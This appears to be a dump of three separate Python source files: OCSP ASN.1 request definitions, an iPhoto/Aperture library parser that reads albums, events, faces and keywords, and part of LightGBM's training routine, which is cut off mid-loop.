explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
)
class TBSRequest(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.DefaultedNamedType('version', Version('v1').subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('requestorName', GeneralName().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.NamedType('requestList', univ.SequenceOf(componentType=Request())),
namedtype.OptionalNamedType('requestExtensions', rfc2459.Extensions().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)))
)
class OCSPRequest(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('tbsRequest', TBSRequest()),
namedtype.OptionalNamedType('optionalSignature', Signature().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
)
|
|
'''iPhoto database: reads iPhoto database and parses it into albums and images.
@author: tsporkert@gmail.com
This class reads iPhoto image, event, album information from the file
AlbumData.xml in the iPhoto library directory. That file is written by iPhoto
for the media browser in other applications. All data are
organized in the class IPhotoData. Images in iPhoto are grouped using events
(formerly knows as rolls) and albums. Each image is in exactly one event, and
optionally, in zero or more albums. Albums can be nested (folders). The album
types are:
Flagged - flagged pictures
Folder - contains other albums
Published - an album published to MobileMe
Regular - a regular user created album
SelectedEventAlbum - most recent album (as shown in iPhoto)
Shelf - list of flagged images
Smart - a user created smart album
SpecialMonth - "Last Month"
SpecialRoll - "Last Import"
Event - this type does not exist in the XML file, but we use it in this code
to allow us to treat events just like any other album
Face - Face album (does not exist in iPhoto, only in this code).
None - should not really happen
'''
# Original work Copyright 2010 Google Inc.
# Modified work Copyright 2014 Luke Hagan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modifications to original source by Luke Hagan:
#
# 2014-06-04: retrieve keywords from iPhoto database using sqlite;
# fix a bug in copying of originals
#
import datetime
import os
import re
import sys
import appledata.applexml as applexml
import tilutil.imageutils as imageutils
import tilutil.systemutils as su
# List of extensions for image formats that are considered JPEG.
_JPG_EXTENSIONS = ('jpg', 'jpeg')
# Convert Aperture numeric album types to iPhoto album type names.
_APERTURE_ALBUM_TYPES = {
'1': 'Regular',
'2': 'Smart',
'3': 'Special',
'4': 'Event',
'5': 'Library',
'6': 'Folder',
'8': 'Book',
'9': 'WebPage',
'10':'WebJournal',
'11': 'LightTable',
'13': 'SmartWebPage',
'14': 'MobileMeAccount',
'15': 'MobileMeAlbum',
'16': 'FlickrAccount',
'17': 'FlickrAlbum',
'18': 'OnlineAccount',
'19': 'Slideshow',
'20': 'Published',
# Patching up some albums that are stored with no album type.
'Last Import': 'Special',
'Recovered Photos': 'Special',
}
def parse_face_rectangle(string_data):
"""Parse a rectangle specification into an array of coordinate data.
Args:
string_data: Rectangle like '{{x, y}, {width, height}}'
Returns:
Array of x, y, width and height as floats.
"""
try:
return [float(entry.strip('{} ')) for entry in string_data.split(',')]
except ValueError:
print >> sys.stderr, 'Failed to parse rectangle ' + string_data
return [ 0.4, 0.4, 0.2, 0.2 ]
def _get_aperture_master_path(preview_path):
"""Given a path to a Aperture preview image, return the folder where the
Master would be stored if it is in the library."""
# Folder where preview image is stored.
folder = os.path.dirname(preview_path)
# Cut of the last folder in the path (see iphotodata_test.py for
# example).
folder = os.path.dirname(folder)
return folder.replace('/Previews/', '/Masters/', 1)
class IPhotoData(object):
"""top level iPhoto data node."""
def __init__(self, xml_data, xml_data2, ratings, is_aperture, aperture_data):
"""# call with results of readAppleXML."""
self.data = xml_data
self.data2 = xml_data2 if xml_data2 else xml_data
self.aperture = is_aperture
self.aperture_data = aperture_data
self.albums = {}
self.face_albums = None
# Master map of keywords
self.keywords = self.data.get("List of Keywords")
self.face_names = {} # Master map of faces
face_list = self.data.get("List of Faces")
if face_list:
for face_entry in face_list.values():
face_key = face_entry.get("key")
face_name = face_entry.get("name")
self.face_names[face_key] = face_name
# Other keys in face_entry: image, key image face index,
# PhotoCount, Order
self.images_by_id = {}
image_data = self.data.get("Master Image List")
if image_data:
for key in image_data:
image = IPhotoImage(key, image_data.get(key), self.keywords,
self.face_names, aperture_data)
self.images_by_id[key] = image
album_data = self.data2.get("List of Albums")
self.root_album = IPhotoContainer("", "Root", None, None, None)
for data in album_data:
album = IPhotoAlbum(data, self.images_by_id, ratings, self.albums,
self.root_album, aperture_data)
self.albums[album.albumid] = album
self._rolls = {}
if not self.aperture:
roll_data = self.data2.get("List of Rolls")
if roll_data:
for roll in roll_data:
roll = IPhotoRoll(roll, self.images_by_id, ratings, aperture_data)
other_roll = self._rolls.get(roll.albumid)
if other_roll:
# iPhoto 9.1.2 issue: it splits rolls into many small rolls, each with a few
# images. We'll merge the images back together into a single roll.
other_roll.merge(roll)
else:
self._rolls[roll.albumid] = roll
self.root_album.addalbum(roll)
self.images_by_base_name = None
self.images_by_file_name = None
def _build_image_name_list(self):
self.images_by_base_name = {}
self.images_by_file_name = {}
# build the basename map
for image in self.images_by_id.values():
base_name = image.getbasename()
other_images = self.images_by_base_name.get(base_name)
if other_images is None:
other_images = []
self.images_by_base_name[base_name] = other_images
other_images.append(image)
imagename = image.getimagename()
other_image_list = self.images_by_file_name.get(imagename)
if other_image_list is None:
other_image_list = []
self.images_by_file_name[imagename] = other_image_list
other_image_list.append(image)
def _getapplicationversion(self):
return self.data.get("Application Version")
applicationVersion = property(_getapplicationversion, doc='iPhoto version')
def _getimages(self):
return self.images_by_id.values()
images = property(_getimages, "List of images")
def _getrolls(self):
return self._rolls.values()
rolls = property(_getrolls, "List of rolls (events)")
def getroll(self, album_id):
return self._rolls.get(album_id)
def getbaseimages(self, base_name):
"""returns an IPhotoImage list of all images with a matching base name.
"""
if not self.images_by_base_name:
self._build_image_name_list()
return self.images_by_base_name.get(base_name)
def getnamedimage(self, file_name):
"""returns an IPhotoImage for the given file name."""
if not self.images_by_file_name:
self._build_image_name_list()
image_list = self.images_by_file_name.get(file_name)
if image_list:
return image_list[0]
return None
def getallimages(self):
"""returns map from full path name to image."""
image_map = {}
for image in self.images_by_id.values():
image_map[image.GetImagePath()] = image
image_map[image.thumbpath] = image
if image.originalpath is not None:
image_map[image.originalpath] = image
return image_map
def checkalbumsizes(self, max_size):
"""Prints a message for any event or album that has too many images."""
messages = []
for album in self._rolls.values():
if album.size > max_size:
messages.append("%s: event too large (%d)" % (album.name,
album.size))
for album in self.albums.values():
if album.albumtype == "Regular" and album.size > max_size:
messages.append("%s: album too large (%d)" % (album.name,
album.size))
messages.sort()
for message in messages:
print message
def check_photos(self):
"""Attempts to verify that the data are not corrupt by checking the "Photos" album
against the image list.
"""
photos = None
for album in self.albums.values():
if album.master:
photos = album
break
if not photos:
su.pout("No Photos album in library.")
return
# Check size of Photos album vs. Master Image List
if photos.size != len(self.images_by_id):
su.pout("Warning: Master image list has %d images, but Photos album has %d images." % (
len(self.images_by_id), photos.size))
# Cross check Photos vs. Master Image List
photos_ids = {}
for photo in photos.images:
photos_ids[photo.id] = photo # Make a map of Photos by id for the second phase below
if not self.images_by_id.has_key(photo.id):
su.pout("Warning: only in Photos album, but not in Master Image List: %s" % (
photo.caption))
print photo
for image in self.images:
if not photos_ids.has_key(image.id):
su.pout("Warning: only in Master Image List, but not in Photos album: %s" % (
image.caption))
print image
def load_aperture_originals(self):
"""Attempts to locate the original image files (Masters). Only works if
the masters are stored in the library."""
if not self.aperture or self.aperture_data:
return
su.pout('Scanning for Originals...')
for image in self.images_by_id.values():
image.find_aperture_original()
# public void checkComments() {
# TreeSet<String> images = new TreeSet<String>();
# for (IPhotoImage image : images_by_id.values()) {
# String comment = image.GetComment();
# if ((comment == null or comment.length() == 0) && !image.IsHidden())
# images.add(image.caption);
# }
# for (String caption : images)
# System.out.println(caption + ": missing comment.");
# }
def check_inalbums(self):
"""Checks that all images are in albums according to their events."""
messages = []
for image in self.images_by_id.values():
if image.IsHidden():
continue
roll_name = self._rolls[image.roll].name
albums = []
in_album = False
for album in image.GetAlbums():
album_name = album.name
if album.GetAlbumType == "Regular":
albums.append(album.name)
in_album = True
if album_name != roll_name:
messages.append(image.caption + ": in wrong album (" +
roll_name + " vs. " + album_name + ").")
elif (album.isSmart() and album_name.endswith(" Collection") or
album_name == "People" or album_name == "Unorganized"):
in_album = True
if not in_album:
messages.append(image.caption + ": not in any album.")
if albums:
messages.append(image.caption + ": in more than one album: " +
" ".join(albums))
messages.sort()
for message in messages:
print message
def getfacealbums(self):
"""Returns a map of albums for faces."""
if self.face_albums:
return self.face_albums.values()
# Build the albums on first call
self.face_albums = {}
for image in self.images:
for face in image.getfaces():
face_album = self.face_albums.get(face)
if not face_album:
face_album = IPhotoFace(face)
self.face_albums[face] = face_album
face_album.addimage(image)
return self.face_albums.values()
#def has_comments(self):
# """Returns True if at least one of the images has a comment."""
# for image in self.images_by_id.values():
# if image.comment:
# return True
# return False
def print_summary(self):
named_rolls = {}
for roll in self._rolls.values():
named_rolls[roll.name] = roll
for roll in sorted(named_rolls.keys()):
named_rolls[roll].print_summary()
named_albums = {}
for album in self.albums.values():
named_albums[album.name] = album
for album in sorted(named_albums):
named_albums[album].print_summary()
_CAPTION_PATTERN = re.compile(
r'([12][0-9][0-9][0-9])([01][0-9])([0123][0-9]) (.*)')
class IPhotoImage(object):
"""Describes an image in the iPhoto database."""
def __init__(self, key, data, keyword_map, face_map, aperture_data):
self.id = key
self.data = data
self._caption = su.nn_string(data.get("Caption")).strip()
self.comment = su.nn_string(data.get("Comment")).strip()
version = None
if aperture_data:
version = aperture_data.versions.get(key)
if data.has_key("DateAsTimerInterval"):
self.date = applexml.getappletime(data.get("DateAsTimerInterval"))
elif version:
self.date = version.image_date
else:
# Try to get the date from a the caption in "YYYYMMDD ..." format
m = re.match(_CAPTION_PATTERN, self._caption)
if m:
year = int(m.group(1))
month = int(m.group(2))
if not month:
month = 1
date = int(m.group(3))
if not date:
date = 1
self.date = datetime.datetime(year, month, date)
else:
self.date = None
self.mod_date = applexml.getappletime(
data.get("ModDateAsTimerInterval"))
self.image_path = data.get("ImagePath")
if data.has_key("Rating"):
self.rating = int(data.get("Rating"))
elif version:
self.rating = version.mainRating
else:
self.rating = None
if data.get("longitude"):
latitude = float(data.get("latitude"))
longitude = float(data.get("longitude"))
self.gps = imageutils.GpsLocation(latitude, longitude)
elif version:
self.gps = version.location
else:
self.gps = None
self.keywords = []
keyword_list = data.get("Keywords")
if keyword_list is not None:
for i in keyword_list:
self.keywords.append(keyword_map.get(i))
elif version:
self.keywords = version.keywords
if version:
self.originalpath = None # This is just a placeholder...
# Use the preview if there are adjustments.
if (version.rotation or version.hasAdjustments or
not su.getfileextension(version.master_image_path) in _JPG_EXTENSIONS):
#if version.rotation:
# su.pout(u"Rotated: %s (%d)" % (self._caption, version.rotation))
#if version.hasAdjustments:
# su.pout(u"Adjustments: %s" % (self._caption))
#if not su.getfileextension(version.master_image_path) in _JPG_EXTENSIONS:
# su.pout(u"Not JPEG: %s" % (self._caption))
self.originalpath = version.master_image_path
if not version.imageProxy.fullSizePreviewPath:
su.pout(u"No preview path for %s." % (self.caption))
else:
self.image_path = version.imageProxy.fullSizePreviewPath
else:
self.image_path = version.master_image_path
self.originalpath = None
if not version.imageProxy.fullSizePreviewUpToDate:
su.pout(u"%s: full size preview not up to date." % (self.caption))
else:
self.originalpath = data.get("OriginalPath")
self.roll = data.get("Roll")
self.albums = [] # list of albums that this image belongs to
self.faces = []
self.face_rectangles = []
self.event_name = '' # name of event (roll) that this image belongs to
self.event_index = '' # index within event
self.event_index0 = '' # index with event, left padded with 0
face_list = data.get("Faces")
if face_list:
for face_entry in face_list:
face_key = face_entry.get("face key")
face_name = face_map.get(face_key)
if face_name:
self.faces.append(face_name)
# Rectangle is '{{x, y}, {width, height}}' as ratios,
# referencing the lower left corner of the face rectangle,
# with lower left corner of image as (0,0)
rectangle = parse_face_rectangle(face_entry.get("rectangle"))
# Convert to using center of area, relative to upper left corner of image
rectangle[0] += rectangle[2] / 2.0
rectangle[1] = max(0.0, 1.0 - rectangle[1] - rectangle[3] / 2.0)
self.face_rectangles.append(rectangle)
# Other keys in face_entry: face index
# Now sort the faces left to right.
sorted_names = {}
sorted_rectangles = {}
for i in xrange(len(self.faces)):
x = self.face_rectangles[i][0]
while sorted_names.has_key(x):
x += 0.00001
sorted_names[x] = self.faces[i]
sorted_rectangles[x] = self.face_rectangles[i]
self.faces = [sorted_names[x] for x in sorted(sorted_names.keys())]
self.face_rectangles = [
sorted_rectangles[x] for x in sorted(sorted_rectangles.keys())]
def getimagepath(self):
"""Returns the full path to this image.."""
return self.image_path
def getimagename(self):
"""Returns the file name of this image.."""
name = os.path.split(self.image_path)[1]
return name
def getbasename(self):
"""Returns the base name of the main image file."""
return su.getfilebasename(self.image_path)
def _getcaption(self):
if not self._caption:
return self.getimagename()
return self._caption
caption = property(_getcaption, doc="Caption (title) of the image")
def ismovie(self):
"""Tests if this image is a movie."""
return self.data.get("MediaType") == "Movie"
def addalbum(self, album):
"""Adds an album to the list of albums for this image."""
self.albums.append(album)
def addface(self, name):
"""Adds a face (name) to the list of faces for this image."""
self.faces.append(name)
def getfaces(self):
"""Gets the list of face tags for this image."""
return self.faces
def ishidden(self):
"""Tests if the image is hidden (using keyword "Hidden")"""
return "Hidden" in self.keywords
def _getthumbpath(self):
return self.data.get("ThumbPath")
thumbpath = property(_getthumbpath, doc="Path to thumbnail image")
def _getrotationisonlyedit(self):
return self.data.get("RotationIsOnlyEdit")
rotation_is_only_edit = property(_getrotationisonlyedit,
doc="Rotation is only edit.")
def _search_for_file(self, folder_path, basename):
"""Scans recursively through a folder tree and returns the path to the
first file it finds that starts with "basename".
"""
for file_name in su.os_listdir_unicode(folder_path):
path = os.path.join(folder_path, file_name)
if os.path.isdir(path):
path = self._search_for_file(path, basename)
if path:
return path
elif file_name.startswith(basename):
return path
return None
def find_aperture_original(self):
"""Attempts to locate the Aperture Master image. Works only for .jpg
masters that are stored in the Aperture library. Saves the result as
originalpath."""
master_path = _get_aperture_master_path(self.image_path)
if not os.path.exists(master_path):
return
basename = su.getfilebasename(self.image_path)
file_name = os.path.join(master_path, basename + '.jpg')
if os.path.exists(file_name):
self.originalpath = file_name
return
path = self._search_for_file(master_path, basename + '.')
if path:
self.originalpath = path
return
su.pout(u"No master for %s" % (self.image_path))
class IPhotoContainer(object):
"""Base class for IPhotoAlbum and IPhotoRoll."""
def __init__(self, name, albumtype, data, images, ratings, aperture_data=None, verbose=False):
self.name = name
self._date = None
self.uuid = None
self.comment = None
if data:
if data.get("RollDateAsTimerInterval"):
self._date = applexml.getappletime(data.get("RollDateAsTimerInterval"))
if data.get("uuid"):
self.uuid = data.get("uuid")
if self.uuid == 'lastImportAlbum':
albumtype = "Special Roll"
if 'Comments' in data:
self.comment = data.get("Comments")
if aperture_data:
container = None
if self.uuid and self.uuid in aperture_data.folders:
container = aperture_data.folders[self.uuid]
elif self.uuid and self.uuid in aperture_data.albums:
container = aperture_data.albums[self.uuid]
if container and container.note:
self.comment = container.note
# The iPhoto master album has no album type.
if not albumtype and data and data.has_key("Master"):
albumtype = 'Master'
# Convert Aperture numeric album types to iPhoto album type names.
if albumtype in _APERTURE_ALBUM_TYPES:
albumtype = _APERTURE_ALBUM_TYPES[albumtype]
elif not albumtype:
if verbose:
su.pout(u'No album type for %s.' % name)
elif albumtype.isdigit():
albumid = int(albumtype)
if albumid > 90:
# 94 - Photos
# 95 - Flagged
# 96 - Library Album
# 97 - Projects
# 98 - Aperture
# 99 - Aperture Library
albumtype = name
else:
print 'Unknown album type %s for %s.' % (albumtype, name)
self.albumtype = albumtype
self.data = data
self.albumid = -1
self.images = []
self.albums = []
self.master = False
hidden = 0
if not self.isfolder() and data and (
data.has_key("KeyList") or data.has_key("KeyListString")):
keylist = data.get("KeyList") if data.has_key("KeyList") else data.get(
"KeyListString").split(",")
for key in keylist:
if not key:
continue
image = images.get(key)
if image:
if ratings and not image.rating in ratings:
continue
self.images.append(image)
else:
hidden += 1
if verbose:
su.pout(u"%s: image with id %s does not exist - could be hidden." % (name,
key))
if hidden:
su.pout(u"%s: %d images not exported (probably hidden)." % (name, hidden))
self._assign_names()
def _assign_names(self):
"""Assigns sequential index values to all images if this container is an Event."""
if self.albumtype != 'Event':
return
i = 1
index_digits = len(str(len(self.images)))
for image in self.images:
image.event_name = self.name
image.event_index = i
image.event_index0 = str(i).zfill(index_digits)
i += 1
def merge(self, other_roll):
for image in other_roll.images:
self.images.append(image)
self._assign_names()
def _getsize(self):
return len(self.images)
size = property(_getsize, "Gets the size (# of images) of this album.")
def isfolder(self):
"""tests if this album is a folder."""
return "Folder" == self.albumtype
def getfolderhint(self):
"""Gets a suggested folder name from comments."""
if self.comment:
for comment in self.comment.split("\n"):
if comment.startswith("@"):
return comment[1:]
return None
def getcommentwithouthints(self):
"""Gets the image comments, with any folder hint lines removed"""
result = []
if self.comment:
for line in self.comment.split("\n"):
if not line.startswith("@"):
result.append(line)
return "\n".join(result)
def addalbum(self, album):
"""adds an album to this container."""
self.albums.append(album)
def _getdate(self):
# For containers that don't have a date, we calculate it from the image dates.
if not self._date:
for image in self.images:
if image.date and (not self._date or image.date < self._date):
self._date = image.date
return self._date
date = property(_getdate, doc='date of container (based on oldest image)')
def tostring(self):
"""Gets a string that describes this album or event."""
return "%s (%s)" % (self.name, self.albumtype)
def print_summary(self):
if self.albumtype != "Event":
return
original_count = 0
file_size = 0
original_size = 0
face_count = 0
for image in self.images:
face_count += len(image.getfaces())
if image.originalpath:
original_count += 1
if os.path.exists(image.originalpath):
original_size += os.path.getsize(image.originalpath)
if os.path.exists(image.image_path):
file_size += os.path.getsize(image.image_path)
if not image.originalpath:
original_size += os.path.getsize(image.image_path)
file_size = file_size / 1024.0 / 1024.0
original_size = original_size / 1024.0 / 1024.0
su.pout(u"%-50s %4d images (%6.1f MB), %3d originals (%6.1f MB), %3d faces" % (
self.tostring(), len(self.images), file_size, original_count, original_size,
face_count))
class IPhotoRoll(IPhotoContainer):
"""Describes an iPhoto Roll or Event."""
def __init__(self, data, images, ratings, aperture_data):
IPhotoContainer.__init__(self,
data.get("RollName")
if data.has_key("RollName")
else data.get("AlbumName"),
"Event", data, images, ratings, aperture_data)
self.albumid = data.get("RollID")
if not self.albumid:
self.albumid = data.get("AlbumId")
class IPhotoAlbum(IPhotoContainer):
"""Describes an iPhoto Album."""
def __init__(self, data, images, ratings, album_map, root_album, aperture_data):
IPhotoContainer.__init__(self, data.get("AlbumName"),
data.get("Album Type") if data.has_key("Album Type") else "Regular",
data, images, ratings, aperture_data)
self.albumid = data.get("AlbumId")
if data.has_key("Master"):
self.master = True
parent_id = data.get("Parent")
if parent_id is None:
self.parent = root_album
else:
self.parent = album_map.get(parent_id)
if not self.parent:
print "Album %s: parent with id %d not found." % (
self.name, parent_id)
if self.parent:
self.parent.addalbum(self)
class IPhotoFace(object):
"""An IPhotoContainer compatible class for a face."""
def __init__(self, face):
self.name = face
self.albumtype = "Face"
self.albumid = -1
self.images = []
self.albums = []
self.comment = ""
self.date = datetime.datetime.now()
def _getsize(self):
return len(self.images)
size = property(_getsize, "Gets the size (# of images) of this album.")
def isfolder(self):
"""tests if this album is a folder."""
return False
def getfolderhint(self):
"""Gets a suggested folder name from comments."""
return None
def getcommentwithouthints(self):
"""Gets the image comments, with any folder hint lines removed"""
return ""
def addimage(self, image):
"""Adds an image to this container."""
self.images.append(image)
# Set the face date based on the earlierst image.
if image.date and image.date < self.date:
self.date = image.date
def tostring(self):
"""Gets a string that describes this album or event."""
return "%s (%s)" % (self.name, self.albumtype)
def get_album_xmlfile(library_dir):
"""Locates the iPhoto AlbumData.xml or Aperture ApertureData.xml file."""
if os.path.exists(library_dir) and os.path.isdir(library_dir):
album_xml_file = os.path.join(library_dir, "AlbumData.xml")
if os.path.exists(album_xml_file):
return album_xml_file
album_xml_file = os.path.join(library_dir, "ApertureData.xml")
if os.path.exists(album_xml_file):
return album_xml_file
raise ValueError, ("%s does not appear to be a valid iPhoto or Aperture "
"library location.") % (library_dir)
def get_album_sqlfile(library_dir):
"""Locates the iPhoto Library.apdb file."""
if os.path.exists(library_dir) and os.path.isdir(library_dir):
album_sql_file = os.path.join(library_dir, "Database", "apdb", "Library.apdb")
if os.path.exists(album_sql_file):
return album_sql_file
raise ValueError, ("%s does not appear to be a valid iPhoto "
"library location.") % (library_dir)
def get_iphoto_data(album_xml_file, album_sql_file, ratings=None, verbose=False, aperture=False):
"""reads the iPhoto database and converts it into an iPhotoData object."""
library_dir = os.path.dirname(album_xml_file)
is_aperture = aperture or album_xml_file.endswith('ApertureData.xml')
if verbose:
print "Reading %s database from %s..." % (
'Aperture' if is_aperture else 'iPhoto', album_xml_file)
album_xml = applexml.read_applexml(album_xml_file, album_sql_file)
album_xml2 = None
if is_aperture:
try:
import appledata.aperturedata as aperturedata
aperture_data = aperturedata.get_aperture_data(library_dir, verbose)
except ImportError:
aperture_data = None
else:
aperture_data = None
# Recent iPhoto versions write event and album data into
# iLifeShared/AlbumData2.xml.
album_xml_file2 = os.path.join(os.path.split(album_xml_file)[0],
"iLifeShared", "AlbumData2.xml")
if os.path.exists(album_xml_file2):
if verbose:
su.pout("Reading event and album data from %s..." % (album_xml_file2))
album_xml2 = applexml.read_applexml(album_xml_file2, None)
application_version = album_xml.get("Application Version")
data = IPhotoData(album_xml, album_xml2, ratings, is_aperture, aperture_data)
if is_aperture:
if (not data.applicationVersion.startswith('3.')
and not data.applicationVersion.startswith('9.')):
raise ValueError, "Aperture version %s not supported" % (
data.applicationVersion)
else:
if (not data.applicationVersion.startswith("9.") and
not data.applicationVersion.startswith("8.") and
not data.applicationVersion.startswith("7.") and
not data.applicationVersion.startswith("6.")):
raise ValueError, "iPhoto version %s not supported" % (
data.applicationVersion)
return data
|
|
# coding: utf-8
"""Library with training routines of LightGBM."""
import collections
import copy
from operator import attrgetter
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
import numpy as np
from . import callback
from .basic import (Booster, Dataset, LightGBMError, _ArrayLike, _choose_param_value, _ConfigAliases, _InnerPredictor,
_log_warning)
from .compat import SKLEARN_INSTALLED, _LGBMGroupKFold, _LGBMStratifiedKFold
_LGBM_CustomObjectiveFunction = Callable[
[np.ndarray, Dataset],
Tuple[_ArrayLike, _ArrayLike]
]
_LGBM_CustomMetricFunction = Callable[
[np.ndarray, Dataset],
Tuple[str, float, bool]
]
def train(
params: Dict[str, Any],
train_set: Dataset,
num_boost_round: int = 100,
valid_sets: Optional[List[Dataset]] = None,
valid_names: Optional[List[str]] = None,
fobj: Optional[_LGBM_CustomObjectiveFunction] = None,
feval: Optional[Union[_LGBM_CustomMetricFunction, List[_LGBM_CustomMetricFunction]]] = None,
init_model: Optional[Union[str, Path, Booster]] = None,
feature_name: Union[List[str], str] = 'auto',
categorical_feature: Union[List[str], List[int], str] = 'auto',
keep_training_booster: bool = False,
callbacks: Optional[List[Callable]] = None
) -> Booster:
"""Perform the training with given parameters.
Parameters
----------
params : dict
Parameters for training.
train_set : Dataset
Data to be trained on.
num_boost_round : int, optional (default=100)
Number of boosting iterations.
valid_sets : list of Dataset, or None, optional (default=None)
List of data to be evaluated on during training.
valid_names : list of str, or None, optional (default=None)
Names of ``valid_sets``.
fobj : callable or None, optional (default=None)
Customized objective function.
Should accept two parameters: preds, train_data,
and return (grad, hess).
preds : numpy 1-D array
The predicted values.
Predicted values are returned before any transformation,
e.g. they are raw margin instead of probability of positive class for binary task.
train_data : Dataset
The training dataset.
grad : list, numpy 1-D array or pandas Series
The value of the first order derivative (gradient) of the loss
with respect to the elements of preds for each sample point.
hess : list, numpy 1-D array or pandas Series
The value of the second order derivative (Hessian) of the loss
with respect to the elements of preds for each sample point.
For multi-class task, the preds is group by class_id first, then group by row_id.
If you want to get i-th row preds in j-th class, the access way is score[j * num_data + i]
and you should group grad and hess in this way as well.
feval : callable, list of callable, or None, optional (default=None)
Customized evaluation function.
Each evaluation function should accept two parameters: preds, train_data,
and return (eval_name, eval_result, is_higher_better) or list of such tuples.
preds : numpy 1-D array
The predicted values.
If ``fobj`` is specified, predicted values are returned before any transformation,
e.g. they are raw margin instead of probability of positive class for binary task in this case.
train_data : Dataset
The training dataset.
eval_name : str
The name of evaluation function (without whitespaces).
eval_result : float
The eval result.
is_higher_better : bool
Is eval result higher better, e.g. AUC is ``is_higher_better``.
For multi-class task, the preds is group by class_id first, then group by row_id.
If you want to get i-th row preds in j-th class, the access way is preds[j * num_data + i].
To ignore the default metric corresponding to the used objective,
set the ``metric`` parameter to the string ``"None"`` in ``params``.
init_model : str, pathlib.Path, Booster or None, optional (default=None)
Filename of LightGBM model or Booster instance used for continue training.
feature_name : list of str, or 'auto', optional (default="auto")
Feature names.
If 'auto' and data is pandas DataFrame, data columns names are used.
categorical_feature : list of str or int, or 'auto', optional (default="auto")
Categorical features.
If list of int, interpreted as indices.
If list of str, interpreted as feature names (need to specify ``feature_name`` as well).
If 'auto' and data is pandas DataFrame, pandas unordered categorical columns are used.
All values in categorical features should be less than int32 max value (2147483647).
Large values could be memory consuming. Consider using consecutive integers starting from zero.
All negative values in categorical features will be treated as missing values.
The output cannot be monotonically constrained with respect to a categorical feature.
keep_training_booster : bool, optional (default=False)
Whether the returned Booster will be used to keep training.
If False, the returned value will be converted into _InnerPredictor before returning.
This means you won't be able to use ``eval``, ``eval_train`` or ``eval_valid`` methods of the returned Booster.
When your model is very large and cause the memory error,
you can try to set this param to ``True`` to avoid the model conversion performed during the internal call of ``model_to_string``.
You can still use _InnerPredictor as ``init_model`` for future continue training.
callbacks : list of callable, or None, optional (default=None)
List of callback functions that are applied at each iteration.
See Callbacks in Python API for more information.
Returns
-------
booster : Booster
The trained Booster model.
"""
# create predictor first
params = copy.deepcopy(params)
if fobj is not None:
for obj_alias in _ConfigAliases.get("objective"):
params.pop(obj_alias, None)
params['objective'] = 'none'
for alias in _ConfigAliases.get("num_iterations"):
if alias in params:
num_boost_round = params.pop(alias)
_log_warning(f"Found `{alias}` in params. Will use it instead of argument")
params["num_iterations"] = num_boost_round
# setting early stopping via global params should be possible
params = _choose_param_value(
main_param_name="early_stopping_round",
params=params,
default_value=None
)
if params["early_stopping_round"] is None:
params.pop("early_stopping_round")
first_metric_only = params.get('first_metric_only', False)
if num_boost_round <= 0:
raise ValueError("num_boost_round should be greater than zero.")
predictor: Optional[_InnerPredictor] = None
if isinstance(init_model, (str, Path)):
predictor = _InnerPredictor(model_file=init_model, pred_parameter=params)
elif isinstance(init_model, Booster):
predictor = init_model._to_predictor(dict(init_model.params, **params))
init_iteration = predictor.num_total_iteration if predictor is not None else 0
# check dataset
if not isinstance(train_set, Dataset):
raise TypeError("Training only accepts Dataset object")
train_set._update_params(params) \
._set_predictor(predictor) \
.set_feature_name(feature_name) \
.set_categorical_feature(categorical_feature)
is_valid_contain_train = False
train_data_name = "training"
reduced_valid_sets = []
name_valid_sets = []
if valid_sets is not None:
if isinstance(valid_sets, Dataset):
valid_sets = [valid_sets]
if isinstance(valid_names, str):
valid_names = [valid_names]
for i, valid_data in enumerate(valid_sets):
# reduce cost for prediction training data
if valid_data is train_set:
is_valid_contain_train = True
if valid_names is not None:
train_data_name = valid_names[i]
continue
if not isinstance(valid_data, Dataset):
raise TypeError("Training only accepts Dataset object")
reduced_valid_sets.append(valid_data._update_params(params).set_reference(train_set))
if valid_names is not None and len(valid_names) > i:
name_valid_sets.append(valid_names[i])
else:
name_valid_sets.append(f'valid_{i}')
# process callbacks
if callbacks is None:
callbacks_set = set()
else:
for i, cb in enumerate(callbacks):
cb.__dict__.setdefault('order', i - len(callbacks))
callbacks_set = set(callbacks)
if "early_stopping_round" in params:
callbacks_set.add(
callback.early_stopping(
stopping_rounds=params["early_stopping_round"],
first_metric_only=first_metric_only,
verbose=_choose_param_value(
main_param_name="verbosity",
params=params,
default_value=1
).pop("verbosity") > 0
)
)
callbacks_before_iter_set = {cb for cb in callbacks_set if getattr(cb, 'before_iteration', False)}
callbacks_after_iter_set = callbacks_set - callbacks_before_iter_set
callbacks_before_iter = sorted(callbacks_before_iter_set, key=attrgetter('order'))
callbacks_after_iter = sorted(callbacks_after_iter_set, key=attrgetter('order'))
# construct booster
try:
booster = Booster(params=params, train_set=train_set)
if is_valid_contain_train:
booster.set_train_data_name(train_data_name)
for valid_set, name_valid_set in zip(reduced_valid_sets, name_valid_sets):
booster.add_valid(valid_set, name_valid_set)
finally:
train_set._reverse_update_params()
for valid_set in reduced_valid_sets:
valid_set._reverse_update_params()
booster.best_iteration = 0
# start training
for i in range(init_iteration, init_iteration + num_boost_round):
for cb in callbacks_before_iter:
cb(callback.CallbackEnv(model=booster,
params=params,
iteration=i,
begin_iteration=init_iteration,
end_iteration=init_iteration + num_boost_round,
evaluation_result_list=None))
booster.update(fobj=fobj)
evaluation_result_list = []
# check evaluation result.
if valid_sets is not None:
if is_valid_contain_train:
evaluation_result_list.extend(booster.eval_train(feval))
evaluation_result_list.extend(booster.eval_valid(feval))
try:
for cb in callbacks_after_iter:
cb(callback.CallbackEnv(model=booster,
params=params,
iteration=i,
begin_iteration=init_iteration,
end_iteration=init_iteration + num_boost_round,
evaluation_result_list=evaluation_result_list))
except callback.EarlyStopException as earlyStopException:
booster.best_iteration = earlyStopException.best_iteration + 1
evaluation_result_list = earlyStopException.best_score
break
